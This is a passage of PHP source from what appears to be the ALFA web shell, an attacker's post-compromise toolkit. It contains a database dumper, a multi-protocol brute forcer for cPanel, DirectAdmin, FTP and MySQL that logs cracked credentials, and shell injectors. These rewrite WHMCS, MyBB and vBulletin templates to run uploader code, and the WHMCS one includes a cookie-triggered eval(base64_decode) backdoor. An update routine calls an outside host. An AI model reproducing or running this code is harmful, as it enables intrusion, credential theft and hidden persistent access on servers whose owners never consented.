        $db = false;
        if (!empty($dbname)) {
            $db = @mysqli_connect($host, $username, $password, $dbname);
        }
        if (count($selected_data) > 0) {
            if ($db) {
                if (!is_dir($dfile)) {
                    $dfile = $GLOBALS['cwd'];
                }
                $tbls = "";
                $ext = '.txt';
                if ($delimiter == 'json') {
                    $ext = '.json';
                }
                foreach ($selected_data as $tbl => $cols) {
                    $tables_query = mysqli_query($db, "SELECT " . implode(',', $cols) . " FROM {$tbl}");
                    $file_name = $dfile . '/' . $dbname . '.' . $tbl . $ext;
                    $fp = fopen($file_name, "w");
                    $data = array();
                    while ($row = mysqli_fetch_array($tables_query, MYSQLI_ASSOC)) {
                        if ($delimiter == "json") {
                            $col_arr = array();
                            foreach ($row as $key => $value) {
                                if (empty($value)) {
                                    $value = "[empty]";
                                }
                                $col_arr[$key] = $value;
                            }
                            $data[$tbl][] = $col_arr;
                        } else {
                            $data = "";
                            foreach ($row as $key => $value) {
                                if (empty($value)) {
                                    $value = "[empty]";
                                }
                                $data .= $value . $delimiter;
                            }
                            fwrite($fp, $data . "\n");
                        }
                    }
                    if ($delimiter == "json") {
                        fwrite($fp, json_encode($data));
                    }
                    fclose($fp);
                    $tbls .= "Done ~~~> " . $file_name . "<br>";
                }
                echo __pre();
                echo "<center><font color='#00FF00'>" . $tbls . "</font></center>";
            }
        }
        if (!empty($dbname) && count($selected_data) == 0) {
            //echo __pre();
            if ($db) {
                echo "<hr><div style='text-align:center;margin-bottom:5px;font-weight:bolder;'><span>[ Select your tables and columns for dumping data ]</span></div>";
                echo "<div style='text-align:center;'><span>Output Type: </span><select id='dumper-delimiter-type' onchange='colDumplerSelectType(this);' name='output_type'><option value='delimiter' selected>delimiter</option><option value='json'>json</option></select><div id='coldumper-delimiter-input' style='display:inline;'><span> Delimiter: </span><input id='dumper-delimiter-input' style='text-align:center;' type='text' name='delimiter' placeholder='eg: ,'></div></div>";
                $data = array();
                $tables_query = mysqli_query($db, "SELECT table_name FROM information_schema.tables WHERE table_schema = database();");
                while ($row = mysqli_fetch_array($tables_query, MYSQLI_ASSOC)) {
                    $data[$row["table_name"]] = array();
                    $table_count_q = mysqli_query($db, "SELECT count(*) FROM `" . $row['table_name'] . "`");
                    $table_count = mysqli_fetch_row($table_count_q);
                    $data[$row["table_name"]]["data_count"] = $table_count[0];
                    $columns_query = mysqli_query($db, "SELECT column_name FROM information_schema.columns WHERE table_name = '" . $row['table_name'] . "'");
                    while ($row2 = mysqli_fetch_array($columns_query, MYSQLI_ASSOC)) {
                        $data[$row["table_name"]]["cols"][] = $row2["column_name"];
                    }
                }
                mysqli_close($db);
                echo "<ul id=\"myUL\">";
                foreach ($data as $tbl => $cols) {
                    echo '<li><span style="color:#00FF00;" class="box">' . $tbl . ' (' . $cols["data_count"] . ')</span><ul class="nested">';
                    foreach ($cols["cols"] as $col) {
                        echo '<li tbl="' . $tbl . '"><span style="color:#00FF00;" tbl="' . $tbl . '" class="box sub-box">' . $col . '</span></li>';
                    }
                    echo "</ul></li>";
                }
                echo "</ul>";
            } else {
                echo "<center>mysqli_connect : Error!</center>";
            }
        }
        echo "</div>";
        alfafooter();
    }
    function alfaDumper()
    {
        alfahead();
        echo "<div class=\"header\">";
        AlfaNum(8, 9, 10);
        echo "<center><br><div class='txtfont_header'>| Mysql Database Dumper |</div><br><br>" . getConfigHtml('all') . "<form method='post' onsubmit=\"g('dumper',null,null,null,this.db_username.value,this.db_password.value,this.db_name.value,this.dfile.value,this.db_host.value); return false;\"><p>";
        $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Dump Path: ', 'inputName' => 'dfile', 'inputValue' => htmlspecialchars($GLOBALS['cwd']) . 'alfa.sql', 'inputSize' => '50'));
        create_table($table);
        echo "<br><input type='submit' value=' ' name='Submit'></p></form></center>";
        $username = $_POST['alfa3'];
        $password = $_POST['alfa4'];
        $dbname = $_POST['alfa5'];
        $dfile = $_POST['alfa6'];
        $host = $_POST['alfa7'];
        if (!empty($dbname)) {
            echo __pre();
            $msg = "<center>Check this :  <font color='red'>" . $dfile . "</font></center>";
            if (@mysqli_connect($host, $username, $password, $dbname)) {
                if (strlen(alfaEx("mysqldump")) > 0) {
                    alfaEx("mysqldump --single-transaction --host=\"{$host}\" --user=\"{$username}\" --password=\"{$password}\" {$dbname} > '" . addslashes($dfile) . "'");
                    echo $msg;
                } else {
                    __alert("Error...!");
                }
            } else {
                echo "<center>mysqli_connect : Error!</center>";
            }
        }
        echo "</div>";
        alfafooter();
    }
    function Alfa_DirectAdmin_Cracker($info)
    {
        if (!$info['mysql']) {
            $url = $info['protocol'] . $info['target'] . ':' . $info['port'] . '/CMD_LOGIN';
        } else {
            $url = $info['protocol'] . $info['target'] . '/phpmyadmin';
        }
        $curl = curl_init();
        curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
        curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');
        curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, 0);
        curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0);
        curl_setopt($curl, CURLOPT_HEADER, 0);
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($curl, CURLOPT_URL, $url);
        curl_setopt($curl, CURLOPT_USERPWD, $info['username'] . ':' . $info['password']);
        if ($info['mysql']) {
            curl_setopt($curl, CURLOPT_HTTPAUTH, CURLAUTH_ANY);
        }
        $result = @curl_exec($curl);
        $curl_errno = curl_errno($curl);
        $curl_error = curl_error($curl);
        if ($curl_errno > 0) {
            echo "<font color='red'>Error: {$curl_error}</font><br>";
        } elseif (preg_match('/CMD_FILE_MANAGER|frameset/i', $result)) {
            echo 'UserName: <font color="red">' . $info['username'] . '</font> PassWord: <font color="red">' . $info['password'] . '</font><font color="green">  Login Success....</font><br>';
            $info['target'] = $url;
            CrackerResualt($info);
        }
        curl_close($curl);
    }
    function Alfa_CP_Cracker($info)
    {
        $url = $info['protocol'] . $info['target'] . ':' . $info['port'];
        $curl = curl_init();
        curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
        curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');
        curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, 0);
        curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0);
        curl_setopt($curl, CURLOPT_HEADER, 0);
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($curl, CURLOPT_HTTPHEADER, array("Authorization: Basic " . __ZW5jb2Rlcg($info['username'] . ":" . $info['password']) . "\n\r"));
        curl_setopt($curl, CURLOPT_URL, $url);
        $result = @curl_exec($curl);
        $curl_errno = curl_errno($curl);
        $curl_error = curl_error($curl);
        if ($curl_errno > 0) {
            echo "<font color='red'>Error: {$curl_error}</font><br>";
        } elseif (preg_match('/filemanager/i', $result)) {
            echo 'UserName: <font color="red">' . $info['username'] . '</font> PassWord: <font color="red">' . $info['password'] . '</font><font color="green">  Login Success....</font><br>';
            $info['target'] = $url;
            CrackerResualt($info);
        }
        curl_close($curl);
    }
    function Alfa_FTP_Cracker($info)
    {
        $url = $info['protocol'] . $info['target'];
        $curl = curl_init();
        curl_setopt($curl, CURLOPT_URL, $url);
        curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($curl, CURLOPT_USERPWD, "" . $info['username'] . ":" . $info['password'] . "");
        $result = @curl_exec($curl);
        $curl_errno = curl_errno($curl);
        $curl_error = curl_error($curl);
        if ($curl_errno > 0) {
            echo "<font color='red'>Error: {$curl_error}</font><br>";
        } elseif (preg_match('/(\\d+):(\\d+)/i', $result)) {
            echo 'UserName: <font color="red">' . $info['username'] . '</font> PassWord: <font color="red">' . $info['password'] . '</font><font color="green">  Login Success....</font><br>';
            $info['target'] = $url;
            CrackerResualt($info);
        }
        curl_close($curl);
    }
    function Alfa_Mysql_Cracker($info)
    {
        if (@mysqli_connect($info['target'] . ':' . $info['port'], $info['username'], $info['password'])) {
            CrackerResualt($info);
            echo 'UserName: <font color="red">' . $info['username'] . '</font> PassWord: <font color="red">' . $info['password'] . '</font><font color="green">  Login Success....</font><br>';
        }
    }
    function Alfa_FTPC($info)
    {
        if ($con = @ftp_connect($info['target'], $info['port'])) {
            if ($con) {
                $login = @ftp_login($con, $info['username'], $info['password']);
                if ($login) {
                    CrackerResualt($info);
                }
            }
        }
        @ftp_close($con);
    }
    function CrackerResualt($info)
    {
        $res = $info['target'] . ' => ' . $info['username'] . ":" . $info['password'] . "\n";
        $c = @fopen($info['fcrack'], 'a+');
        @fwrite($c, $res);
        @fclose($c);
    }
    function Alfa_Call_Function_Cracker($method, $info)
    {
        switch ($method) {
            case 'cp':
                return Alfa_CP_Cracker($info);
            case 'direct':
            case 'phpmyadmin':
                return Alfa_DirectAdmin_Cracker($info);
            case 'ftp':
                return Alfa_FTP_Cracker($info);
            case 'mysql':
                return Alfa_Mysql_Cracker($info);
            case 'mysql':
                return Alfa_FTPC($info);
        }
    }
    function alfaCrackers()
    {
        alfahead();
        AlfaNum(9, 10);
        echo "<div class=\"header\"><center><br><div class=\"txtfont_header\">| Brute Forcer |</div><br><br><form method=\"post\" onsubmit=\"g('Crackers',null,this.target.value,this.port.value,this.usernames.value,this.passwords.value,this.fcrack.value,'start',this.protocol.value,this.loginpanel.value);return false;\"><div class=\"txtfont\">Login Page: <select onclick=\"dis_input(this.value);\" name=\"loginpanel\">";
        foreach (array('cp' => 'Cpanel', 'direct' => 'DirectAdmin', 'ftp' => 'FTP', 'phpmyadmin' => 'PhpMyAdmin[DirectAdmin]', 'mysql' => 'mysql_connect()', 'ftpc' => 'ftp_connect()') as $key => $val) {
            echo '<option value="' . $key . '">' . $val . '</option>';
        }
        echo "</select> Protocol: <select id=\"protocol\" name=\"protocol\">";
        foreach (array('https://', 'http://', 'ftp://') as $val) {
            echo '<option value="' . $val . '">' . $val . '</option>';
        }
        echo '</select> Website/ip Address: <input id="target" type="text" name="target" value="localhost">
Port: <input id="port" type="text" name="port" value="2083">
<table width="30%"><td align="center">Users List</td><td align="center">Passwords</td></table>
<textarea placeholder="Users" rows="20" cols="25" name="usernames">' . ($GLOBALS['sys'] == 'unix' ? alfaEx("cut -d: -f1 /etc/passwd") : "") . '</textarea>
&nbsp <textarea placeholder="Passwords" rows="20" cols="25" name="passwords"></textarea><br><br>
Save Result Into File <input type="text" name="fcrack" value="cracked.txt">
<p><input type="submit" name="cracking" value=" " /></div></form></p><center>';
        $target = str_replace(array('https://', 'http://', 'ftp://'), '', $_POST['alfa1']);
        $port = $_POST['alfa2'];
        $usernames = $_POST['alfa3'];
        $passwords = $_POST['alfa4'];
        $fcrack = $_POST['alfa5'];
        $cracking = $_POST['alfa6'];
        $protocol = $_POST['alfa7'];
        $loginpanel = $_POST['alfa8'];
        $p = $loginpanel == 'phpmyadmin' ? $p = true : false;
        if ($cracking == 'start') {
            echo __pre();
            $exuser = explode("\n", $usernames);
            $expw = explode("\n", $passwords);
            foreach ($exuser as $user) {
                foreach ($expw as $pw) {
                    $array = array('username' => trim($user), 'password' => trim($pw), 'port' => trim($port), 'target' => trim($target), 'protocol' => trim($protocol), 'fcrack' => trim($fcrack), 'mysql' => $p);
                    Alfa_Call_Function_Cracker($loginpanel, $array);
                }
            }
            echo "<br><font color=\"red\">Attack Finished...</font>";
        }
        echo "</div>";
        alfafooter();
    }
    function output($string)
    {
        echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><font color=red><a target='_blank' href='" . $string . "'>Click Here !</a></font></b></center><br><br>";
    }
    function alfaShellInjectors()
    {
        alfahead();
        echo "<div class=header>";
        AlfaNum(11);
        echo "<center><p><div class=\"txtfont_header\">| Cms Shell Injector |</div></p><center><h3><a href=javascript:void(0) onclick=\"g('ShellInjectors',null,'whmcs',null)\">| WHMCS | </a><a href=javascript:void(0) onclick=\"g('ShellInjectors',null,null,'mybb')\">| MyBB | </a><a href=javascript:void(0) onclick=\"g('ShellInjectors',null,null,null,'vb')\">| vBulletin |</a></h3></center>";
        $selector = '<p><div class="txtfont">Shell Inject Method : </div> <select name="method" style="width:100px;"><option value="auto">AutoMatic</option><option value="man">Manuel</option></select></p>';
        if (isset($_POST['alfa1']) && $_POST['alfa1'] == 'whmcs') {
            AlfaNum();
            echo __pre() . "<p><div class='txtfont_header'>| WHMCS |</div></p><center><center><p>" . getConfigHtml('whmcs') . "</p><form onSubmit=\"g('ShellInjectors',null,'whmcs',null,null,this.method.value,null,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.path.value); return false;\" method='post'>";
            $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Path WHMCS Url : ', 'inputName' => 'path', 'inputValue' => 'http://site.com/whmcs', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host : ', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db Name : ', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db User : ', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass : ', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'));
            create_table($table);
            echo "<p><div class=\"txtfont\">Shell Inject Method : </div> <select name=\"method\" style=\"width:100px;\"><option value=\"auto\">AutoMatic</option><option value=\"man\">Manuel</option></select></p>";
            echo "<p><input type='submit' value=' '></p></form></center></td></tr></table></center>";
            if (isset($_POST['alfa6'])) {
                $dbu = $_POST['alfa6'];
                $dbn = $_POST['alfa7'];
                $dbp = $_POST['alfa8'];
                $dbh = $_POST['alfa9'];
                $path = $_POST['alfa10'];
                $method = $_POST['alfa4'];
                $index = "{php}ALFA_UPLOADER;{/php}";
                $newin = "{php}ALFA_UPLOADER;{/php}";
                $newindex = "<p>Dear {php}ALFA_UPLOADER;{/php},</p><p>Recently a request was submitted to reset your password for our client area. If you did not request this, please ignore this email. It will expire and become useless in 2 hours time.</p><p>To reset your password, please visit the url below:<br /><a href=\"{\$pw_reset_url}\">{\$pw_reset_url}</a></p><p>When you visit the link above, your password will be reset, and the new password will be emailed to you.</p><p>{\$signature}</p>{php}if(\$_COOKIE[\"sec\"] == \"123\"){eval(base64_decode(\$_COOKIE[\"sec2\"])); die(\"!\");}{\\/php}";
                if (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($index)) {
                    if (filter_var($path, FILTER_VALIDATE_URL)) {
                        $conn = mysqli_connect($dbh, $dbu, $dbp, $dbn) or die(mysqli_connect_error());
                        $soleSave = mysqli_query($conn, "select message from tblemailtemplates where name='Password Reset Validation'");
                        $soleGet = mysqli_fetch_assoc($soleSave);
                        $tempSave1 = $soleGet['message'];
                        $tempSave = str_replace("'", "\\'", $tempSave1);
                        mysqli_query($conn, "UPDATE tblconfiguration SET value = '1' WHERE setting = 'AllowSmartyPhpTags'") or die(mysqli_error($conn));
                        $inject = "UPDATE tblemailtemplates SET message='<p>Dear {php}ALFA_UPLOADER;{/php},</p><p>Recently a request was submitted to reset your password for our client area. If you did not request this, please ignore this email. It will expire and become useless in 2 hours time.</p><p>To reset your password, please visit the url below:<br /><a href=\"{\$pw_reset_url}\">{\$pw_reset_url}</a></p><p>When you visit the link above, your password will be reset, and the new password will be emailed to you.</p><p>{\$signature}</p>{php}if(\$_COOKIE[\"sec\"] == \"123\"){eval(base64_decode(\$_COOKIE[\"sec2\"])); die(\"!\");}{\\/php}' WHERE name='Password Reset Validation'";
                        $result = mysqli_query($conn, $inject) or die(mysqli_error($conn));
                        $create = "insert into tblclients (email) values('solevisible@fbi.gov')";
                        $result2 = mysqli_query($conn, $create) or die(mysqli_error($conn));
                        if (function_exists('curl_version') && $method == 'auto') {
                            $AlfaSole = new AlfaCURL(true);
                            $saveurl = $AlfaSole->Send($path . "/pwreset.php");
                            $getToken = preg_match("/name=\"token\" value=\"(.*?)\"/i", $saveurl, $token);
                            $AlfaSole->Send($path . "/pwreset.php", "post", "token={$token[1]}&action=reset&email=solevisible@fbi.gov");
                            $backdata = "UPDATE tblemailtemplates SET message='{$tempSave}' WHERE name='Password Reset Validation'";
                            $Solevisible = mysqli_query($conn, $backdata) or die(mysqli_error($conn));
                            __alert("shell injectet...");
                            $ff = 'http://' . $path . "/solevisible.php";
                            output($ff);
                        } else {
                            echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><b><font color=\"#FFFFFF\">Please go to Target => </font><a href='" . $path . "/pwreset.php' target='_blank'>" . $path . "/pwreset.php</a><br/><font color='#FFFFFF'> And Reset Password With Email</font> => <font color=red>solevisible@fbi.gov</font><br/><font color='#FFFFFF'>And Go To => </font><a href='" . $path . "/solevisible.php' target='_blank'>" . $path . "/solevisible.php</a></b></center><br><br>";
                        }
                    } else {
                        __alert('Path is not Valid...');
                    }
                }
            }
        }
        if (isset($_POST['alfa2']) && $_POST['alfa2'] == 'mybb') {
            AlfaNum(1, 2, 3, 5);
            echo __pre() . "<p><div class='txtfont_header'>| MyBB |</div></p><center><center>" . getConfigHtml("mybb") . "<form id='sendajax' onSubmit=\"g('ShellInjectors',null,null,'mybb',null,this.method.value,null,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.prefix.value); return false;\" method=POST>\r\n";
            $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Host : ', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'DataBase Name : ', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'User Name : ', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Password : ', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Table Prefix : ', 'inputName' => 'prefix', 'id' => 'db_prefix', 'inputValue' => 'mybb_', 'inputSize' => '50'));
            create_table($table);
            echo $selector;
            echo "<p><input type=submit value=' '></p></form></center></center>";
            if (isset($_POST['alfa6'])) {
                $dbu = $_POST['alfa6'];
                $dbn = $_POST['alfa7'];
                $dbp = $_POST['alfa8'];
                $dbh = $_POST['alfa9'];
                $prefix = $_POST['alfa10'];
                $method = $_POST['alfa4'];
                $shellCode = "{\${ALFA_UPLOADER}}";
                $newinshell = "{\${ALFA_UPLOADER}}";
                if (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($newinshell)) {
                    $conn = mysqli_connect($dbh, $dbu, $dbp, $dbn) or die(mysqli_error($conn));
                    $inject = "select template from {$prefix}templates where  title= 'calendar'";
                    $result = mysqli_query($conn, $inject) or die(mysqli_error($conn));
                    $GetTemp = mysqli_fetch_assoc($result);
                    $saveDate = $GetTemp['template'];
                    $repsave = str_replace($shellCode, "", $saveDate);
                    $repsave = str_replace("'", "\\'", $repsave);
                    $createShell = "update {$prefix}templates SET template= '" . $newinshell . $repsave . "' where title = 'calendar'";
                    $result2 = mysqli_query($conn, $createShell) or die(mysqli_error($conn));
                    $geturl = "select value from {$prefix}settings where name= 'bburl'";
                    $findurl = mysqli_query($conn, $geturl) or die(mysqli_error($conn));
                    $rowb = mysqli_fetch_assoc($findurl);
                    $furl = $rowb['value'];
                    $realurl = parse_url($furl, PHP_URL_HOST);
                    $realpath = parse_url($furl, PHP_URL_PATH);
                    $res = false;
                    $AlfaCurl = new AlfaCURL();
                    if (extension_loaded('sockets') && function_exists('fsockopen') && $method == 'auto') {
                        if ($fsock = @fsockopen($realurl, 80, $errno, $errstr, 10)) {
                            @fputs($fsock, "GET {$realpath}/calendar.php HTTP/1.1\r\n");
                            @fputs($fsock, "HOST: {$realurl}\r\n");
                            @fputs($fsock, "Connection: close\r\n\r\n");
                            $check = fgets($fsock);
                            if (preg_match("/200 OK/i", $check)) {
                                $repairdbtemp = "update {$prefix}templates SET template= '{$repsave}' where title = 'calendar'";
                                $clear = mysqli_query($conn, $repairdbtemp) or die(mysqli_error($conn));
                                $res = true;
                            }
                            @fclose($fsock);
                        }
                    } elseif (function_exists('curl_version') && $method == 'auto') {
                        $AlfaCurl->Send($realurl . $realpath . "/calendar.php");
                        $res = true;
                    }
                    if ($res) {
                        $ff = 'http://' . $realurl . $realpath . "/solevisible.php";
                        output($ff);
                    } else {
                        $ff = 'http://' . $realurl . $realpath . "/calendar.php";
                        $fff = 'http://' . $realurl . $realpath . "/solevisible.php";
                        echo "<br><pre id='strOutput' style='margin-top:5px' class='ml1'><br><center><b><font color='#FFFFFF'>Please Go To Target => </font><a href='" . $ff . "' target='_blank'>" . $ff . "</a><br/><font color='#FFFFFF'>And Go To => </font><a href='" . $fff . "' target='_blank'>" . $fff . "</a></b></center><br><br>";
                    }
                }
            }
        }
        if (isset($_POST['alfa3']) && $_POST['alfa3'] == 'vb') {
            AlfaNum(1, 2, 7, 9, 10);
            echo __pre() . '<p><div class="txtfont_header">| vbulletin |</div></p><p>' . getConfigHtml('vb') . '</p><form name="frm" method="POST" onsubmit="g(\'ShellInjectors\',null,null,this.lo.value,\'vb\',this.user.value,this.pass.value,this.tab.value,this.db.value,this.method.value); return false;">';
            $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Host : ', 'inputName' => 'lo', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'DataBase Name : ', 'inputName' => 'db', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'User Name : ', 'inputName' => 'user', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Password : ', 'inputName' => 'pass', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Table Prefix : ', 'inputName' => 'tab', 'id' => 'db_prefix', 'inputValue' => '', 'inputSize' => '50'));
            create_table($table);
            echo $selector;
            echo "<p><input type=\"submit\" value=\" \" /></p></form></center>";
            if (isset($_POST['alfa4']) && !empty($_POST['alfa4'])) {
                $method = $_POST['alfa8'];
                $faq_name = "faq";
                $faq_file = "/faq.php";
                $code = "{\${ALFA_UPLOADER}}{\${exit()}}&";
                $conn = @mysqli_connect($_POST['alfa2'], $_POST['alfa4'], $_POST['alfa5'], $_POST['alfa7']) or die(@mysqli_connect_error());
                $rec = "select `template` from " . $_POST['alfa6'] . "template WHERE title ='" . $faq_name . "'";
                $recivedata = @mysqli_query($conn, $rec);
                $getd = @mysqli_fetch_assoc($recivedata);
                $savetoass = $getd['template'];
                if (empty($savetoass)) {
                    $faq_name = "header";
                    $faq_file = "/";
                    $rec = "select `template` from " . $_POST['alfa6'] . "template WHERE title ='" . $faq_name . "'";
                    $recivedata = @mysqli_query($conn, $rec);
                    $getd = @mysqli_fetch_assoc($recivedata);
                    $savetoass = $getd['template'];
                    $code = "ALFA_UPLOADER;";
                }
                $code = str_replace("'", "\\'", $code);
                $p = "UPDATE " . $_POST['alfa6'] . "template SET `template`='" . $code . "' WHERE `title`='" . $faq_name . "'";
                $ka = @mysqli_query($conn, $p) or die(mysqli_error($conn));
                $geturl = @mysqli_query($conn, "select `value` from " . $_POST['alfa6'] . "setting WHERE `varname`='bburl'");
                $getval = @mysqli_fetch_assoc($geturl);
                $saveval = $getval['value'];
                if ($faq_name == "header") {
                    if (substr($saveval, -5, 5) == "/core") {
                        $saveval = substr($saveval, 0, -5);
                    }
                }
                $realurl = parse_url($saveval, PHP_URL_HOST);
                $realpath = parse_url($saveval, PHP_URL_PATH);
                $res = false;
                $AlfaCurl = new AlfaCURL();
                if (extension_loaded('sockets') && function_exists('fsockopen') && $method == 'auto') {
                    if ($fsock = @fsockopen($realurl, 80, $errno, $errstr, 10)) {
                        @fputs($fsock, "GET {$realpath}.{$faq_file} HTTP/1.1\r\n");
                        @fputs($fsock, "HOST: {$realurl}\r\n");
                        @fputs($fsock, "Connection: close\r\n\r\n");
                        $check = fgets($fsock);
                        if (preg_match("/200 OK/i", $check)) {
                            $p1 = "UPDATE " . $_POST['alfa6'] . "template SET template ='" . mysqli_real_escape_string($conn, $savetoass) . "' WHERE title ='" . $faq_name . "'";
                            $ka1 = @mysqli_query($conn, $p1) or die(mysqli_error($conn));
                            $res = true;
                        }
                        @fclose($fsock);
                    }
                } elseif (function_exists('curl_version') && $method == 'auto') {
                    $AlfaCurl->Send($realurl . $realpath . $faq_file);
                    $p1 = "UPDATE " . $_POST['alfa6'] . "template SET template ='" . mysqli_real_escape_string($conn, $savetoass) . "' WHERE title ='" . $faq_name . "'";
                    $ka1 = @mysqli_query($conn, $p1) or die(mysqli_error($conn));
                    $res = true;
                }
                if ($res) {
                    $ff = 'http://' . $realurl . $realpath . "/solevisible.php";
                    output($ff);
                } else {
                    $ff = 'http://' . $realurl . $realpath . $faq_file;
                    $fff = 'http://' . $realurl . $realpath . "/solevisible.php";
                    echo "<center><p><font color=\"#FFFFFF\">First Open This Link => </font><a href='" . $ff . "' target='_blank'>" . $ff . "</a><br/><font color=\"#FFFFFF\">Second Open This Link => </font><a href='" . $fff . "' target='_blank'>" . $fff . "</a></center></p>";
                }
            }
        }
        echo "</div>";
        alfafooter();
    }
    function alfacheckfiletype()
    {
        $path = $_POST['path'];
        $arg = $_POST['arg'];
        if (@is_file($path . '/' . $arg)) {
            echo "file";
        } else {
            echo "dir";
        }
    }
    function alfacheckupdate()
    {
        if ($GLOBALS["DB_NAME"]["cgi_api"]) {
            if (!isset($_COOKIE["alfacgiapi_mode"]) && !isset($_COOKIE["alfacgiapi"])) {
                _alfa_cgicmd("whoami", "perl", true);
                if (strlen(alfaEx("whoami", false, true)) > 0) {
                    __alfa_set_cookie("alfa_canruncmd", "true");
                }
            }
        }
        if (function_exists("curl_version")) {
            $update = new AlfaCURL();
            $json = $update->Send("http://solevisible.com/update.json?ver=4.1");
            $json = @json_decode($json, true);
            $data = array();
            if ($json) {
                if (!isset($_COOKIE['alfa_checkupdate']) && !empty($json["type"])) {
                    if ($json["type"] == "update") {
                        if (__ALFA_VERSION__ != $json['version'] || __ALFA_UPDATE__ != $json['version_number']) {
                            @setcookie("alfa_checkupdate", "1", time() + 86400);
                            $data["content"] = '<div class="update-holder">' . $json["content"] . '</div>';
                        }
                    }
                }
                if (isset($json["ads"]) && !empty($json["ads"])) {
                    $data["content"] .= $json["ads"];
                }
                if (isset($json["copyright"]) && !empty($json["copyright"])) {
                    $data["copyright"] = $json["copyright"];
                }
                if (isset($json["solevisible"]) && !empty($json["solevisible"])) {
                    $data["solevisible"] = $json["solevisible"];
                }
                if (isset($json["code_name"]) && !empty($json["code_name"])) {
                    $data["code_name"] = $json["code_name"];
                    $data["version_number"] = __ALFA_VERSION__;
                }
                if (isset($json["market"]) && !empty($json["market"])) {
                    $data["market"] = $json["market"];
                }
                echo @json_encode($data);
            }
        }
    }
    function alfaWriteTocgiapi($name, $source)
    {
        $temp = "";
        $not_api = array("basedir.alfa", "getdir.alfa", "getheader.alfa");
        if (in_array($name, $not_api)) {
            $temp = ALFA_TEMPDIR;
            if ($temp) {
                @chdir($temp);
            }
        } else {
            alfaCreateParentFolder();
            @chdir($GLOBALS['home_cwd'] . "/" . __ALFA_DATA_FOLDER__);
        }
        @mkdir('alfacgiapi', 0755);
        __write_file("alfacgiapi/" . $name, __get_resource($source));
        @chmod("alfacgiapi/" . $name, 0755);
        return $temp;
    }
    function alfacheckcgi()
    {
        if (strlen(alfaEx("id", false, true, true)) > 0) {
            echo "ok";
        } else {
            echo "no";
        }
    }
    function alfaupdateheader()
    {
        if (!isset($_COOKIE["updateheader_data"])) {
